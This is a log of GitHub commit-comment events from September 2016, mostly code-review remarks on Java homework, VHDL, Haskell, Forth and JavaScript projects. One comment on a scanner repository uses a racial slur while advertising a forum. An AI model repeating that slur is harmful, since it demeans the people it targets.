{"id":"4586290555","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19086715,"position":null,"line":null,"path":null,"commit_id":"0408085d74158e00515ec539143eee3c47365ce2","created_at":"2016-09-19T22:17:33Z","updated_at":"2016-09-19T22:17:33Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/0408085d74158e00515ec539143eee3c47365ce2#commitcomment-19083985) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/d2acfd915fe99498ea17ca32fa74abc0f7a4b827/0408085_vs_dab390c/report.md). cc @jrevels"}},"created_at":"2016-09-19T22:17:33Z"}
{"id":"4586293571","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"guzandreix/HomeworkRep"},"payload":{"comment":{"id":19086720,"position":8,"line":8,"path":"src/ru/sberbank/school/homework3/BackwardArrayListIterator.java","commit_id":"6f23b3b5557a350348ce26b228f9d603292b8281","created_at":"2016-09-19T22:18:17Z","updated_at":"2016-09-19T22:18:17Z","body":"Итератор оказался привязанным к конкретной реализации List'а. Так делать нельзя."}},"created_at":"2016-09-19T22:18:17Z"}
{"id":"4586296310","type":"CommitCommentEvent","actor":{"login":"LarsAsplund"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19086729,"position":20,"line":20,"path":"data_structures/src/Dictionary.vhd","commit_id":"ddb0959bca5a340964df7455f8180757a1741601","created_at":"2016-09-19T22:18:57Z","updated_at":"2016-09-19T22:18:57Z","body":"I'm probably a bit Python inspired on this. Dicts, lists, tuples, and sets all provide a `len` function to return the number of values\r\n"}},"created_at":"2016-09-19T22:18:57Z"}
{"id":"4586298893","type":"CommitCommentEvent","actor":{"login":"MacGyverr"},"repo":{"name":"MacGyverr/skin.metropolis"},"payload":{"comment":{"id":19086730,"position":null,"line":null,"path":null,"commit_id":"925502756e3da15d6e28ffa57053f45777ec373a","created_at":"2016-09-19T22:19:35Z","updated_at":"2016-09-19T22:19:35Z","body":"![screenshot000](https://cloud.githubusercontent.com/assets/6500800/18650853/7783acde-7e7c-11e6-9496-710c8d88c387.jpg)\r\n"}},"created_at":"2016-09-19T22:19:35Z"}
{"id":"4586300130","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"guzandreix/HomeworkRep"},"payload":{"comment":{"id":19086733,"position":23,"line":23,"path":"src/ru/sberbank/school/homework3/BackwardArrayListIterator.java","commit_id":"6f23b3b5557a350348ce26b228f9d603292b8281","created_at":"2016-09-19T22:19:55Z","updated_at":"2016-09-19T22:19:55Z","body":"Несколько нарушен контракт метода next - вместо NoSuchElementException бросится IdexOutOfBoundsException. Правда про исключения будет следующее занятие."}},"created_at":"2016-09-19T22:19:55Z"}
{"id":"4586309926","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"guzandreix/HomeworkRep"},"payload":{"comment":{"id":19086764,"position":32,"line":32,"path":"src/ru/sberbank/school/homework3/CollectionsExercise.java","commit_id":"6f23b3b5557a350348ce26b228f9d603292b8281","created_at":"2016-09-19T22:22:10Z","updated_at":"2016-09-19T22:22:10Z","body":"Можно обойтись одним сравнением длин строк."}},"created_at":"2016-09-19T22:22:10Z"}
{"id":"4586312320","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19086771,"position":155,"line":152,"path":"src/Control/TimeWarp/Timed/MonadTimed.hs","commit_id":"2a2a1450d8e983b7ef4ca56e21e1807a7a3b5285","created_at":"2016-09-19T22:22:43Z","updated_at":"2016-09-19T22:22:43Z","body":"s/sagnificant/significant. Here and in a lot of places."}},"created_at":"2016-09-19T22:22:43Z"}
{"id":"4586315223","type":"CommitCommentEvent","actor":{"login":"xvitaly"},"repo":{"name":"RussianFedora/telegram-desktop"},"payload":{"comment":{"id":19086783,"position":268,"line":226,"path":"telegram-desktop.spec","commit_id":"8f48f3b415058d97961ef5e4c8eb67362601db02","created_at":"2016-09-19T22:23:25Z","updated_at":"2016-09-19T22:23:25Z","body":"Там есть mime-тип внутри .protocol файла."}},"created_at":"2016-09-19T22:23:25Z"}
{"id":"4586315552","type":"CommitCommentEvent","actor":{"login":"mastercoms"},"repo":{"name":"GlowstoneMC/Glowstone"},"payload":{"comment":{"id":19086785,"position":null,"line":null,"path":null,"commit_id":"b1b26234680816f66cc28ed0cd85771264be0a4d","created_at":"2016-09-19T22:23:29Z","updated_at":"2016-09-19T22:23:29Z","body":"Yes, that's why it is beginning to optimize. It can be modified later to put in cache async and do callback so it doesn't block."}},"created_at":"2016-09-19T22:23:29Z"}
{"id":"4586319525","type":"CommitCommentEvent","actor":{"login":"xvitaly"},"repo":{"name":"RussianFedora/telegram-desktop"},"payload":{"comment":{"id":19086792,"position":177,"line":157,"path":"telegram-desktop.spec","commit_id":"8f48f3b415058d97961ef5e4c8eb67362601db02","created_at":"2016-09-19T22:24:24Z","updated_at":"2016-09-19T22:24:24Z","body":"Здесь его нельзя использовать, т.к. это псевдоустановка для дальнейшей статической линковки. Макрос переопределяет каталоги назначения, что нам категорически не годится."}},"created_at":"2016-09-19T22:24:24Z"}
{"id":"4586322096","type":"CommitCommentEvent","actor":{"login":"epoberezkin"},"repo":{"name":"epoberezkin/ajv"},"payload":{"comment":{"id":19086796,"position":null,"line":null,"path":null,"commit_id":"acfd035720193bcff8b365c204dad1a7ae3d6194","created_at":"2016-09-19T22:25:01Z","updated_at":"2016-09-19T22:25:01Z","body":"Yep, figured it. new Function is still better for other reasons, but for CSP it makes no difference. What I didn't figure yet is whether it can/should be relaxed in Electron..."}},"created_at":"2016-09-19T22:25:01Z"}
{"id":"4586326976","type":"CommitCommentEvent","actor":{"login":"aerth"},"repo":{"name":"aerth/go-quitter"},"payload":{"comment":{"id":19086818,"position":null,"line":null,"path":null,"commit_id":"8619d78bae4f3379d849cf65706a6b65d70c89f3","created_at":"2016-09-19T22:26:05Z","updated_at":"2016-09-19T22:26:05Z","body":"Two new environmental variables, SOCKS, and UNSAFE. can be used at the same time."}},"created_at":"2016-09-19T22:26:05Z"}
{"id":"4586328769","type":"CommitCommentEvent","actor":{"login":"DanielJoyce"},"repo":{"name":"vert-x3/vertx-lang-js"},"payload":{"comment":{"id":19086825,"position":null,"line":null,"path":null,"commit_id":"6f07587ebb652faff88a66ff11a8c8e59080b6c0","created_at":"2016-09-19T22:26:30Z","updated_at":"2016-09-19T22:26:30Z","body":"https://github.com/nodejs/node-eps/blob/master/002-es6-modules.md#51-determining-if-source-is-an-es-module\r\n\r\n// looks at:\r\n//   ./node_modules/abc/123.js\r\n//   ./node_modules/abc/123/package.json\r\n//   ./node_modules/abc/123/index.js\r\n// and parent node_modules:\r\n//   ../node_modules/abc/123.js\r\n//   ../node_modules/abc/123/package.json\r\n//   ../node_modules/abc/123/index.js\r\n//   etc.\r\nimport 'abc/123';\r\n\r\nSo it does seem that this IS a bug in jvm-npm.js"}},"created_at":"2016-09-19T22:26:30Z"}
{"id":"4586329633","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"guzandreix/HomeworkRep"},"payload":{"comment":{"id":19086829,"position":49,"line":49,"path":"src/ru/sberbank/school/homework3/CollectionsExercise.java","commit_id":"6f23b3b5557a350348ce26b228f9d603292b8281","created_at":"2016-09-19T22:26:40Z","updated_at":"2016-09-19T22:26:40Z","body":"Идея ДЗ - правильный выбор коллекции под задачу. Здесь, например, лучше использовать HashSet."}},"created_at":"2016-09-19T22:26:40Z"}
{"id":"4586330175","type":"CommitCommentEvent","actor":{"login":"jackrosenthal"},"repo":{"name":"mineslug/ccit-infrastructure"},"payload":{"comment":{"id":19086830,"position":null,"line":null,"path":null,"commit_id":"92525ff24e05b0a0b118d6716f3b282d8764ee8e","created_at":"2016-09-19T22:26:48Z","updated_at":"2016-09-19T22:26:48Z","body":"@ThirdOf5  For `lug.yaml`, the key for powerpoints under files is `Powerpoint`, not `SlidesPPT`."}},"created_at":"2016-09-19T22:26:48Z"}
{"id":"4586335325","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"guzandreix/HomeworkRep"},"payload":{"comment":{"id":19086846,"position":70,"line":70,"path":"src/ru/sberbank/school/homework3/CollectionsExercise.java","commit_id":"6f23b3b5557a350348ce26b228f9d603292b8281","created_at":"2016-09-19T22:28:00Z","updated_at":"2016-09-19T22:28:00Z","body":"Попробуйте здесь использовать не свой итератор, а стандартный: List + listIterator или Deque + descendingIterator"}},"created_at":"2016-09-19T22:28:00Z"}
{"id":"4586340745","type":"CommitCommentEvent","actor":{"login":"solleer"},"repo":{"name":"Level-2/Transphporm"},"payload":{"comment":{"id":19086855,"position":null,"line":null,"path":null,"commit_id":"b867beb88428f9120c34e9e6e9639a9ee56df0ed","created_at":"2016-09-19T22:29:19Z","updated_at":"2016-09-19T22:29:19Z","body":"I'll look into getting that working."}},"created_at":"2016-09-19T22:29:19Z"}
{"id":"4586340871","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19086856,"position":283,"line":307,"path":"src/Control/TimeWarp/Timed/MonadTimed.hs","commit_id":"2a2a1450d8e983b7ef4ca56e21e1807a7a3b5285","created_at":"2016-09-19T22:29:21Z","updated_at":"2016-09-19T22:29:21Z","body":"From this documentation I don't understand what is `TimeAcc3`."}},"created_at":"2016-09-19T22:29:21Z"}
{"id":"4586342607","type":"CommitCommentEvent","actor":{"login":"DanielJoyce"},"repo":{"name":"vert-x3/vertx-lang-js"},"payload":{"comment":{"id":19086863,"position":null,"line":null,"path":null,"commit_id":"6f07587ebb652faff88a66ff11a8c8e59080b6c0","created_at":"2016-09-19T22:29:45Z","updated_at":"2016-09-19T22:29:45Z","body":"http://www.bennadel.com/blog/2169-where-does-node-js-and-require-look-for-modules.htm\r\n\r\n\r\nvar utils = require( \"utils\" );\r\nview rawcode-3.js hosted with ❤ by GitHub\r\n... Node.js will perform a hierarchical directory search for \"node_modules\" and \"utils\" in the following ways:\r\n\r\n./node_modules/utils.js\r\n./node_modules/utils/index.js\r\n./node_modules/utils/package.json"}},"created_at":"2016-09-19T22:29:45Z"}
{"id":"4586343782","type":"CommitCommentEvent","actor":{"login":"tmeissner"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19086864,"position":17,"line":17,"path":"data_structures/src/Dictionary.vhd","commit_id":"ddb0959bca5a340964df7455f8180757a1741601","created_at":"2016-09-19T22:29:58Z","updated_at":"2016-09-19T22:29:58Z","body":"This sound seasonable. In our code at works, that logging serves more as help during developing of the data type itself. If we have a good tested data type, we can omit that I think. Assertions for errors inside the data type sounds reasonable and is something I also use very often. Especially when you have something like the Get function, which returns the value but can't return a potentially error. In this case an assert statement is the only way to signalize the error."}},"created_at":"2016-09-19T22:29:58Z"}
{"id":"4586347064","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"YakovBurtsev/sbt-java-school"},"payload":{"comment":{"id":19086872,"position":21,"line":21,"path":"src/main/java/ru/sberbank/school/homework3/Solution.java","commit_id":"b3deb311f17b3785442bbcdbbf00376393c350c9","created_at":"2016-09-19T22:30:43Z","updated_at":"2016-09-19T22:30:43Z","body":"Определение компаратора лучше вынести из конструктора.\r\nМожно организовать цепочку итераторов - например, в 8-й Java Comparator.thenConparing"}},"created_at":"2016-09-19T22:30:43Z"}
{"id":"4586350249","type":"CommitCommentEvent","actor":{"login":"stlankes"},"repo":{"name":"RWTH-OS/HermitCore"},"payload":{"comment":{"id":19086879,"position":45,"line":45,"path":"hermit/arch/x86/kernel/syscall.c","commit_id":"00dd4b0a2a4b7aeb45343b03341e50dedc0cf061","created_at":"2016-09-19T22:31:19Z","updated_at":"2016-09-19T22:31:19Z","body":"Yeah, it is a bad idea. I will fix it. "}},"created_at":"2016-09-19T22:31:19Z"}
{"id":"4586351801","type":"CommitCommentEvent","actor":{"login":"tmeissner"},"repo":{"name":"VHDL/CoreLib"},"payload":{"comment":{"id":19086883,"position":20,"line":20,"path":"data_structures/src/Dictionary.vhd","commit_id":"ddb0959bca5a340964df7455f8180757a1741601","created_at":"2016-09-19T22:31:42Z","updated_at":"2016-09-19T22:31:42Z","body":"I'm not fixed on Count. Maybe we should discuss that with the other developers :)"}},"created_at":"2016-09-19T22:31:42Z"}
{"id":"4586352993","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"YakovBurtsev/sbt-java-school"},"payload":{"comment":{"id":19086887,"position":39,"line":39,"path":"src/main/java/ru/sberbank/school/homework3/Solution.java","commit_id":"b3deb311f17b3785442bbcdbbf00376393c350c9","created_at":"2016-09-19T22:31:59Z","updated_at":"2016-09-19T22:31:59Z","body":"Идея ДЗ - правильный выбор коллекции под задачу. Здесь будет использоваться TreeMap, хотя лучше всего HashSet."}},"created_at":"2016-09-19T22:31:59Z"}
{"id":"4586354771","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"YakovBurtsev/sbt-java-school"},"payload":{"comment":{"id":19086890,"position":44,"line":44,"path":"src/main/java/ru/sberbank/school/homework3/Solution.java","commit_id":"b3deb311f17b3785442bbcdbbf00376393c350c9","created_at":"2016-09-19T22:32:26Z","updated_at":"2016-09-19T22:32:26Z","body":"А здесь TreeSet"}},"created_at":"2016-09-19T22:32:26Z"}
{"id":"4586357566","type":"CommitCommentEvent","actor":{"login":"basarat"},"repo":{"name":"danielearwicker/immuto-example"},"payload":{"comment":{"id":19086897,"position":3,"line":2,"path":"components/ShelfEditor.tsx","commit_id":"c132d4f3da6095c2069fb85ae97989d104057139","created_at":"2016-09-19T22:33:08Z","updated_at":"2016-09-19T22:33:08Z","body":"> All props are passed through so you can style exactly like the raw input element. It just adds binding\r\n\r\nGood idea. I am completely on board :rose:"}},"created_at":"2016-09-19T22:33:08Z"}
{"id":"4586358758","type":"CommitCommentEvent","actor":{"login":"guzandreix"},"repo":{"name":"guzandreix/HomeworkRep"},"payload":{"comment":{"id":19086901,"position":49,"line":49,"path":"src/ru/sberbank/school/homework3/CollectionsExercise.java","commit_id":"6f23b3b5557a350348ce26b228f9d603292b8281","created_at":"2016-09-19T22:33:25Z","updated_at":"2016-09-19T22:33:25Z","body":"А если мы в ручную уже убеждаемся в уникальности значений добавляемых в hashmap не будет ли это хуже для производительности, ведь HashSet работает на основе HashMap?"}},"created_at":"2016-09-19T22:33:25Z"}
{"id":"4586362405","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"YakovBurtsev/sbt-java-school"},"payload":{"comment":{"id":19086913,"position":56,"line":56,"path":"src/main/java/ru/sberbank/school/homework3/Solution.java","commit_id":"b3deb311f17b3785442bbcdbbf00376393c350c9","created_at":"2016-09-19T22:34:20Z","updated_at":"2016-09-19T22:34:20Z","body":"Попробуйте не использовать другие итераторы.\r\nЦель этого задания - понять какие методы есть в итераторе + понять контракты их использования."}},"created_at":"2016-09-19T22:34:20Z"}
{"id":"4586363666","type":"CommitCommentEvent","actor":{"login":"omidkrad"},"repo":{"name":"brownieboy/es6bindall"},"payload":{"comment":{"id":19086916,"position":10,"line":10,"path":"src/es6bindall.js","commit_id":"9e816d7f3de909eb0bf549f5e3d5b26d53814649","created_at":"2016-09-19T22:34:39Z","updated_at":"2016-09-19T22:34:39Z","body":"Just a tip: If you change the function signature to `bindAll(context, ...methodNames)` then you can drop the check to convert to `methodNames`  to array."}},"created_at":"2016-09-19T22:34:39Z"}
{"id":"4586364262","type":"CommitCommentEvent","actor":{"login":"NzV"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":19086919,"position":2,"line":1,"path":"FeroxRev","commit_id":"92690f43f49d57a6bfc060a24fbc5e97b61d828c","created_at":"2016-09-19T22:34:49Z","updated_at":"2016-09-19T22:34:49Z","body":"Why use an submodule 10 commit behind master ?"}},"created_at":"2016-09-19T22:34:49Z"}
{"id":"4586367837","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"YakovBurtsev/sbt-java-school"},"payload":{"comment":{"id":19086928,"position":68,"line":68,"path":"src/main/java/ru/sberbank/school/homework3/Solution.java","commit_id":"b3deb311f17b3785442bbcdbbf00376393c350c9","created_at":"2016-09-19T22:35:43Z","updated_at":"2016-09-19T22:35:43Z","body":"А здесь хотелось увидеть параметр в конструкторе (использовать информацию о средней длине строки + придётся добавить предположение о кодировке файла)"}},"created_at":"2016-09-19T22:35:43Z"}
{"id":"4586369225","type":"CommitCommentEvent","actor":{"login":"TessieWaithira"},"repo":{"name":"TessieWaithira/Test"},"payload":{"comment":{"id":19086934,"position":null,"line":null,"path":null,"commit_id":"ddd2eadd5ddaee6abb34562d2346888d909f208f","created_at":"2016-09-19T22:36:04Z","updated_at":"2016-09-19T22:36:04Z","body":"this is a good start"}},"created_at":"2016-09-19T22:36:04Z"}
{"id":"4586370862","type":"CommitCommentEvent","actor":{"login":"elazarg"},"repo":{"name":"python/mypy"},"payload":{"comment":{"id":19086941,"position":16,"line":843,"path":"mypy/test/data/check-classes.test","commit_id":"9dd1086e76c4d62011c2ff1479abae30565c6db2","created_at":"2016-09-19T22:36:29Z","updated_at":"2016-09-19T22:36:29Z","body":"Yet another problematic version:\r\n```\r\nclass A: pass\r\n\r\nclass B:\r\n    def __radd__(self, a: A) -> int: ...\r\n\r\ndef f(a: A) -> int:\r\n    return a + B()  # good?\r\n\r\nclass A1(A):\r\n    def __add__(self, b: object) -> str: ...  # If we knew it's B we could have rejected\r\n\r\nf(A1())  # ouch, returns str, not int\r\n```\r\nThis code is unsafe, and accepted by mypy. But it has nothing to do with explicit overloading, and there's very little to do about it (except disallowing `__radd__` on types that do not prohibit subtypes from declaring `__add__`); so mypy isn't sound."}},"created_at":"2016-09-19T22:36:29Z"}
{"id":"4586371003","type":"CommitCommentEvent","actor":{"login":"stumpymd"},"repo":{"name":"stumpymd/Hello-world"},"payload":{"comment":{"id":19086944,"position":null,"line":null,"path":null,"commit_id":"f8c4744e3b49381c234cf79ce96e383fcb88aa4b","created_at":"2016-09-19T22:36:31Z","updated_at":"2016-09-19T22:36:31Z","body":"Selected Automatic Page Generator"}},"created_at":"2016-09-19T22:36:31Z"}
{"id":"4586371657","type":"CommitCommentEvent","actor":{"login":"HeVictor"},"repo":{"name":"HeVictor/VOXSPELL-Prototype"},"payload":{"comment":{"id":19086948,"position":null,"line":null,"path":null,"commit_id":"4aac2be120dd73743ec2d7b29554d4f80ea63d14","created_at":"2016-09-19T22:36:41Z","updated_at":"2016-09-19T22:36:41Z","body":"Actually this is done by Jacky, somehow I had this overridden. Also this supposedly should take whitespace inputs now."}},"created_at":"2016-09-19T22:36:41Z"}
{"id":"4586372037","type":"CommitCommentEvent","actor":{"login":"danielearwicker"},"repo":{"name":"danielearwicker/immuto-example"},"payload":{"comment":{"id":19086950,"position":3,"line":2,"path":"components/ShelfEditor.tsx","commit_id":"c132d4f3da6095c2069fb85ae97989d104057139","created_at":"2016-09-19T22:36:46Z","updated_at":"2016-09-19T22:36:46Z","body":"Awesome! By the way I have started some proper docs: https://danielearwicker.github.io/immuto/"}},"created_at":"2016-09-19T22:36:46Z"}
{"id":"4586372735","type":"CommitCommentEvent","actor":{"login":"HeVictor"},"repo":{"name":"HeVictor/VOXSPELL-Prototype"},"payload":{"comment":{"id":19086954,"position":null,"line":null,"path":null,"commit_id":"a08741b6e7ae7515b17f625d8d1571f258672e68","created_at":"2016-09-19T22:36:57Z","updated_at":"2016-09-19T22:36:57Z","body":"IGNORE THIS"}},"created_at":"2016-09-19T22:36:57Z"}
{"id":"4586372780","type":"CommitCommentEvent","actor":{"login":"quozl"},"repo":{"name":"MitchBradley/cforth"},"payload":{"comment":{"id":19086955,"position":23,"line":96,"path":"src/app/esp8266/tcpnew.fth","commit_id":"322fa90a81f5b99d7c0f31a75007017a17a70406","created_at":"2016-09-19T22:36:57Z","updated_at":"2016-09-19T22:36:57Z","body":"Uh oh, underflow.  `tcp-recved` isn't being given a length.\r\n\r\nat this point my code has\r\n\r\n```\r\n   dup pbuf>len               ( pbuf totlen  adr len )\r\n   rot rx-pcb tcp-recved      ( pbuf  adr len )\r\n```\r\n\r\nAlso a few lines down in yours, `pbuf-free` isn't consuming the length.\r\n"}},"created_at":"2016-09-19T22:36:57Z"}
{"id":"4586373075","type":"CommitCommentEvent","actor":{"login":"jailson-dias"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":19086957,"position":20,"line":15,"path":"courses/templates/course/create.html","commit_id":"75162f0f48d8599787eb9e048f114444d19b0b48","created_at":"2016-09-19T22:37:02Z","updated_at":"2016-09-19T22:37:02Z","body":"Lembrar de concertar todos os conflitos antes de commitar novamente para que isso não aconteça outra vez."}},"created_at":"2016-09-19T22:37:02Z"}
{"id":"4586374678","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"poomponk/sbt-java-school"},"payload":{"comment":{"id":19086962,"position":6,"line":6,"path":"src/main/java/ru/sbt/java/home3/ReverseIterator.java","commit_id":"248f664afc90de0017762d5d0204e38ddfa857b3","created_at":"2016-09-19T22:37:25Z","updated_at":"2016-09-19T22:37:25Z","body":"Итератор в данном контексте не может быть Iterable."}},"created_at":"2016-09-19T22:37:25Z"}
{"id":"4586377772","type":"CommitCommentEvent","actor":{"login":"stlankes"},"repo":{"name":"RWTH-OS/HermitCore"},"payload":{"comment":{"id":19086968,"position":4,"line":147,"path":"hermit/arch/x86/include/asm/stddef.h","commit_id":"f3c00ac178abecbade5719ed764e334c88f75076","created_at":"2016-09-19T22:38:11Z","updated_at":"2016-09-19T22:38:11Z","body":"Yeah, I will fix it."}},"created_at":"2016-09-19T22:38:11Z"}
{"id":"4586379504","type":"CommitCommentEvent","actor":{"login":"Dieggore"},"repo":{"name":"Dieggore/pomodoroApp"},"payload":{"comment":{"id":19086973,"position":null,"line":null,"path":null,"commit_id":"994550d12a7cf464160685c463c1b01c028b67c1","created_at":"2016-09-19T22:38:36Z","updated_at":"2016-09-19T22:38:36Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;5YebCKS2&#x2F;13-set-database-to-save-user-and-tasks-by-day-green\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> set database to save user and tasks by day green</a>"}},"created_at":"2016-09-19T22:38:36Z"}
{"id":"4586380468","type":"CommitCommentEvent","actor":{"login":"vzhilin"},"repo":{"name":"poomponk/sbt-java-school"},"payload":{"comment":{"id":19086976,"position":28,"line":28,"path":"src/main/java/ru/sbt/java/home3/ReverseIterator.java","commit_id":"248f664afc90de0017762d5d0204e38ddfa857b3","created_at":"2016-09-19T22:38:51Z","updated_at":"2016-09-19T22:38:51Z","body":"Нарушается контракт на next - вместо NoSuchElementException вернётся IndexOutOfBounsException. Правда про исключения мы поговорим на следующем занятии."}},"created_at":"2016-09-19T22:38:51Z"}
{"id":"4586382670","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19086988,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T22:39:23Z","updated_at":"2016-09-19T22:39:23Z","body":"Didnt test header much should be <Byte>"}},"created_at":"2016-09-19T22:39:23Z"}
{"id":"4586384618","type":"CommitCommentEvent","actor":{"login":"4ian"},"repo":{"name":"4ian/GD"},"payload":{"comment":{"id":19086990,"position":null,"line":null,"path":null,"commit_id":"6ac34ee7e3065361c16a3a3c82fea300a115c1ed","created_at":"2016-09-19T22:39:54Z","updated_at":"2016-09-19T22:39:54Z","body":"Will probably take a bit of time this week-end to upload a new version :)"}},"created_at":"2016-09-19T22:39:54Z"}
{"id":"4586385753","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19086996,"position":4,"line":40,"path":"openstudiocore/ruby/init_openstudio.cpp","commit_id":"397f7025fd2eefae3b18b175dcbd7ef48afa19a8","created_at":"2016-09-19T22:40:12Z","updated_at":"2016-09-19T22:40:12Z","body":"@kbenne do you know why this is not working to prevent require 'openstudio' after doing require 'openstudio.so'"}},"created_at":"2016-09-19T22:40:12Z"}
{"id":"4586388160","type":"CommitCommentEvent","actor":{"login":"macumber"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19087002,"position":5,"line":41,"path":"openstudiocore/ruby/init_openstudio.cpp","commit_id":"397f7025fd2eefae3b18b175dcbd7ef48afa19a8","created_at":"2016-09-19T22:40:47Z","updated_at":"2016-09-19T22:40:47Z","body":"Not sure this is the right thing to do, I'm just trying to figure out how this method works"}},"created_at":"2016-09-19T22:40:47Z"}
{"id":"4586389524","type":"CommitCommentEvent","actor":{"login":"GrayHatForums"},"repo":{"name":"Ekultek/whitewidow"},"payload":{"comment":{"id":19087006,"position":null,"line":null,"path":null,"commit_id":"c1e5760330f66208170a5a0bb7c58b018d7e09ce","created_at":"2016-09-19T22:41:08Z","updated_at":"2016-09-19T22:41:08Z","body":"yo EKU, u white nigga, join www.grayhatforums.org i dont know if u heard but my father passed away few months back"}},"created_at":"2016-09-19T22:41:08Z"}
{"id":"4586389853","type":"CommitCommentEvent","actor":{"login":"MitchBradley"},"repo":{"name":"MitchBradley/cforth"},"payload":{"comment":{"id":19087007,"position":23,"line":96,"path":"src/app/esp8266/tcpnew.fth","commit_id":"322fa90a81f5b99d7c0f31a75007017a17a70406","created_at":"2016-09-19T22:41:13Z","updated_at":"2016-09-19T22:41:13Z","body":"How about this:\n\ndiff --git a/src/app/esp8266/tcpnew.fth b/src/app/esp8266/tcpnew.fth\nindex 3ce90aa..1a21850 100644\n--- a/src/app/esp8266/tcpnew.fth\n+++ b/src/app/esp8266/tcpnew.fth\n@@ -40,11 +40,11 @@ create inet-addr-none  $ffffffff l,\n    drop             ( )\n ;\n\n-: pbuf>len  ( pbuf -- totlen adr thislen )\n+: pbuf>len  ( pbuf -- adr thislen totlen )\n    >r                (             r: pbuf )\n-   r@ 2 la+ w@       ( totlen      r: pbuf )\n-   r@ la1+ l@        ( totlen adr  r: pbuf )\n-   r> 2 la+ wa1+ w@  ( totlen adr thislen )\n+   r@ la1+ l@        ( adr         r: pbuf )\n+   r@ 2 la+ wa1+ w@  ( adr thislen r: pbuf )\n+   r> 2 la+ w@       ( adr thislen totlen )\n ;\n\n defer handle-data  ( adr len -- )\n@@ -93,11 +93,11 @@ defer respond   ( pcb -- close? )\n    \\ the PCB in which it was received.  Doing this now might speed\n    \\ things up by overlapping TCP ACK network activity with our\n    \\ data processing.\n-   rx-pcb tcp-recved            ( pbuf )\n+   dup pbuf>len                 ( pbuf adr len totlen )\n+   rx-pcb tcp-recved            ( pbuf adr len )\n\n    \\ Give the data to the application code\n-   dup pbuf>len                 ( pbuf totlen  adr len )\n-   handle-data                  ( pbuf totlen )\n+   handle-data                  ( pbuf )\n\n    \\ Release the data buffer\n    pbuf-free drop               ( )\n\n\nOn 9/19/2016 12:36 PM, James Cameron wrote:\n> Uh oh, underflow. |tcp-recved| isn't being given a length.\n> \n> at this point my code has\n> \n> |dup pbuf>len ( pbuf totlen adr len ) rot rx-pcb tcp-recved ( pbuf adr\n> len ) |\n> \n> Also a few lines down in yours, |pbuf-free| isn't consuming the length.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MitchBradley/cforth/commit/322fa90a81f5b99d7c0f31a75007017a17a70406#commitcomment-19086955>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEoszVWBxfrffRAi0ukXMstcdYeg8bDYks5qrw6KgaJpZM4KBClD>.\n> \n"}},"created_at":"2016-09-19T22:41:13Z"}
{"id":"4586390818","type":"CommitCommentEvent","actor":{"login":"GrayHatForums"},"repo":{"name":"Ekultek/whitewidow"},"payload":{"comment":{"id":19087009,"position":null,"line":null,"path":null,"commit_id":"c1e5760330f66208170a5a0bb7c58b018d7e09ce","created_at":"2016-09-19T22:41:28Z","updated_at":"2016-09-19T22:41:28Z","body":"DemonCode~"}},"created_at":"2016-09-19T22:41:28Z"}
{"id":"4586394155","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19087016,"position":null,"line":null,"path":null,"commit_id":"ba496e24d13ac1711e4d954424a41dbe3cfdd924","created_at":"2016-09-19T22:42:17Z","updated_at":"2016-09-19T22:42:17Z","body":"@MichaelWallace30 \r\nAbstractPacket is now called ABSPacket in C#. It should be able to be inherited by any C# class, i haven't tested it out yet though. All i have tested out was that you can inherit it from C#, still need to run tests on it."}},"created_at":"2016-09-19T22:42:17Z"}
